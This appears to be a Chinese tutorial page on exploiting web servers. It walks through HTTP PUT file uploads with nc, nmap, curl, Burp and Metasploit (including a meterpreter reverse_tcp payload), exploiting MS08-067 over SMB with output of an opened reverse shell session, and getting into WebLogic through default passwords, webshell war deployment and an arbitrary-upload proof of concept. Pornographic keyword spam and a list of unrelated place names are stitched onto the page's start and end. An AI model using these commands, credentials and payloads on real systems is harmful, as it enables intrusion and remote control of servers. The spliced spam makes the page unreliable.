亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Web漏洞利用姿勢的示例分析

發布時間:2022-01-17 19:12:02 來源:億速云 閱讀:273 作者:柒染 欄目:網絡安全

這期內容當中小編將會給大家帶來有關Web漏洞利用姿勢的示例分析,文章內容豐富且以專業的角度為大家分析和敘述,閱讀完這篇文章希望大家可以有所收獲。

1、HTTP PUT方法利用

        PUT是用來進行文件管理的方法,若運維人員未修改Web服務器缺省配置,依然支持這些方法,則可以向服務器文件系統任意上傳文件。

1.1、 Netcat利用PUT方法

        Netcat是一款非常出名的網絡工具,簡稱“NC”,有滲透測試中的“瑞士**”之稱。它可以用作端口監聽、端口掃描、遠程文件傳輸、還可以實現遠程shell等功能。

查看得知Web服務開啟PUT方法后,輸入如下命令上傳文件:

    nc IP PORT

    PUT /dav/hack.txt HTTP/1.1

    Host: IP

Web漏洞利用姿勢的示例分析

     按兩次回車可以看到hacked.txt文件已經成功創建,狀態碼是201,文件創建位置為/dav/目錄。

1.2、Nmap利用PUT方法

命令:

nmap -p 端口 IP -script http-put-script-args http-put.url='/dav/test.php',http-put.file='/root/test.php'

命令講解:

        -script http-put //選擇http-put腳本,腳本支持使用http put方法上傳文件。

       -script-args //設置腳本參數1、2

        http-put.url='/dav/test.php' //設置參數1為上傳目標文件路徑

        http-put.file='/root/test.php' //設置參數2為上傳本地文件路徑。

Web漏洞利用姿勢的示例分析

     圖中可以看到通過Nmap腳本上傳成功。

1.3 BurpSuite利用PUT方法

       使用日常見面的BurpSuite訪問上傳目標路徑抓取數據包,修改數據包請求方式及上傳路徑,在請求正文中寫入文件內容,發包至Web服務器。

Web漏洞利用姿勢的示例分析

   服務器響應包顯示文件創建成功。

Web漏洞利用姿勢的示例分析

1.4 CURL利用PUT方法

        CURL是一個利用URL語法在命令行下工作的文件傳輸工具,通過指定的URL來上傳或下載數據,并將數據展示出來。curl中的c表示client,而URL,就是URL。

通過PUT方法創建文件命令如下:

命令1:

curl -i -XPUT -H “Content-Type: text/plain; charset=utf-8” -d “hack completed” http://192.168.40.4/dav/hack.php

Web漏洞利用姿勢的示例分析

命令講解:

        -i/--include //輸出時包括protocol頭信息

        -X/--request <command> //指定PUT命令

       -H/--header <line>  //自定義頭信息“Content-Type:text/plain; charset=utf-8”傳遞給服務器

       -d/--data <data> //HTTP POST方式將文本寫入創建的http://192.168.40.4/dav/hack.php 

命令2:

curl -i -X PUT -H “Content-Type:application/xml; charset=utf-8″ -d @”F:\1.php” http://192.168.40.4/dav/hack.php

Web漏洞利用姿勢的示例分析

命令講解:

-d @“filename” //從文件讀入內容

Web漏洞利用姿勢的示例分析

1.5 QuickPuT腳本利用PUT方法

QuickPut是Python命令行工具,可以利用該腳本通過HTTP PUT方法來上傳文件到服務器。

上傳命令:

python2 QuickPut.py F:\1.php http://192.168.40.4/dav/hack1.php

Web漏洞利用姿勢的示例分析

命令講解:

python QuickPut.py <本地文件> <目標URL>

1.6 Metasploit利用PUT方法

Metasploit的輔助模塊auxiliary/scanner/http/http_put可實現文件上傳,刪除操作。

命令:

use auxiliary/scanner/http/http_put //使用http_put模塊

Web漏洞利用姿勢的示例分析

show options //顯示模塊參數

set RHOSTS 192.168.40.4 //設置目標IP

set PATH /dav/  //設置目標路徑

set payload php/meterpreter/reverse_tcp  //設置攻擊載荷

set filename msf.php //設置上傳文件名

Web漏洞利用姿勢的示例分析

set FILEDATA file://root/test.php //設置上傳本地文件數據路徑

exploit //開始攻擊

Web漏洞利用姿勢的示例分析

返回結果顯示成功上傳文件。

2.SMB漏洞利用

       進行信息收集端口掃描后發現主機開啟139,445端口且banner顯示為Microsoft Windows,則會聯想到與139、445端口SMB漏洞,比較常見的有ms17-010,ms08-067等。

漏洞檢測

命令:

namp --script=/usr/share/nmap/scripts/smb-vuln-ms08-067.nse –sTIP

namp --script=/usr/share/nmap/scripts/smb-vuln-ms17-010.nse –sTIP

命令講解:

--script=/usr/share/nmap/scripts/smb-vuln-ms08-067.nse //使用Nmapms08-067漏洞掃描腳本

-sT //使用TCP掃描

若輸出結果為:

smb-vuln-ms08-067:

VULNERABLE:

Microsoft Windows system vulnerable toremote code execution (MS08-067)

State: VULNERABLE

IDs:  CVE:CVE-2008-4250

The Server service inMicrosoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,Vista Goldand SP1, Server 2008, and 7 Pre-Beta allows remote attackers to executearbitrarycode via a crafted RPC request that triggers the overflow during pathcanonicalization.

Disclosure date: 2008-10-23

References:

https://technet.microsoft.com/en-us/library/security/ms08-067.aspx

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250

則說明存在ms08-067漏洞,ms17-010同上。

漏洞利用

使用MSF smb攻擊模塊,利用ms08-067與ms17-010漏洞。

msf> use exploit/windows/smb/ms08_067_netapi

msfexploit(ms08_067_netapi) > set RHOST IP

msfexploit(ms08_067_netapi) > exploit

[*]Started reverse TCP handler on 本地監聽IP端口

[*]目標IP:445- Automatically detecting the target...

[*]目標IP:445- Fingerprint: Windows 2000 - Service Pack 0 - 4 - lang:English

[*]目標IP:445- Selected Target: Windows 2000 Universal

[*]目標IP:445- Attempting to trigger the vulnerability...

[*]Sending stage (957487 bytes) to 目標IP

[*]Meterpreter session 2 opened (監聽IP端口 -> 目標端口反彈)

meterpreter>

ms17-010漏洞利用同上。

3.Weblogic漏洞利用

      在滲透測試中常常會遇到Weblogic Server應用服務器,看到Weblogic Server后聯想到Weblogic Server可能會存在后臺管理弱口令、JAVA反序列化漏洞、任意文件上傳漏洞等許多本版的各種CVE漏洞。下面分享下Weblogic各種漏洞的利用手法。

Web漏洞利用姿勢的示例分析3.1 后臺登錄弱口令

常見Weblogic Server登錄弱口令:

weblogic/weblogic

weblogic/weblogic1

weblogic/weblogic10

weblogic/weblogic123

若存在即可登錄應用服務器管理后臺,上傳webshellwar包。

Web漏洞利用姿勢的示例分析

上傳后在應用服務器中部署war包

Web漏洞利用姿勢的示例分析

Web漏洞利用姿勢的示例分析

Web漏洞利用姿勢的示例分析上傳部署war包成功后即可訪問大馬。

3.2 JAVA反序列化漏洞

CVE漏洞可直接使用腳本檢測,然后根據漏洞代碼尋找exp腳本漏洞利用。

Weblogic漏洞檢測腳本十分強大,可檢測各種CVE、管理后臺路徑、SSRF、弱口令、并支持后期擴展。

Web漏洞利用姿勢的示例分析

也可利用Java反序列化漏洞利用工具直接進行檢測利用。漏洞工具提供漏洞檢測、命令執行、文件上傳、批量檢查功能。

Web漏洞利用姿勢的示例分析

3.3 Weblogic 任意文件上傳漏洞

通過爆破Weblogic返回信息。

Web漏洞利用姿勢的示例分析

獲取到登錄口令、服務名、隨機字符目錄,構造上傳POC進行測試文件上傳。

在/bea_wls_deployment_internal/DeploymentService路徑下傳入以下數據

Web漏洞利用姿勢的示例分析

服務器返回上傳成功和文件絕對路徑。

Web漏洞利用姿勢的示例分析

訪問此上傳文件路徑后顯示上傳文件內容

http://IP/bea_wls_deployment_internal/shell.jsp

Web漏洞利用姿勢的示例分析

上述就是小編為大家分享的Web漏洞利用姿勢的示例分析了,如果剛好有類似的疑惑,不妨參照上述分析進行理解。如果想知道更多相關知識,歡迎關注億速云行業資訊頻道。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

web
AI

抚顺县| 镇宁| 高州市| 维西| 巩留县| 白朗县| 平舆县| 新安县| 城固县| 梁河县| 宁德市| 抚顺县| 资中县| 葫芦岛市| 嫩江县| 晋宁县| 莒南县| 峨山| 雷波县| 濉溪县| 余干县| 福海县| 汝城县| 三穗县| 东乌| 应用必备| 秦安县| 泗阳县| 故城县| 卫辉市| 淮安市| 海林市| 浙江省| 昌平区| 册亨县| 浠水县| 鹿泉市| 陇西县| 仙游县| 秦安县| 南通市|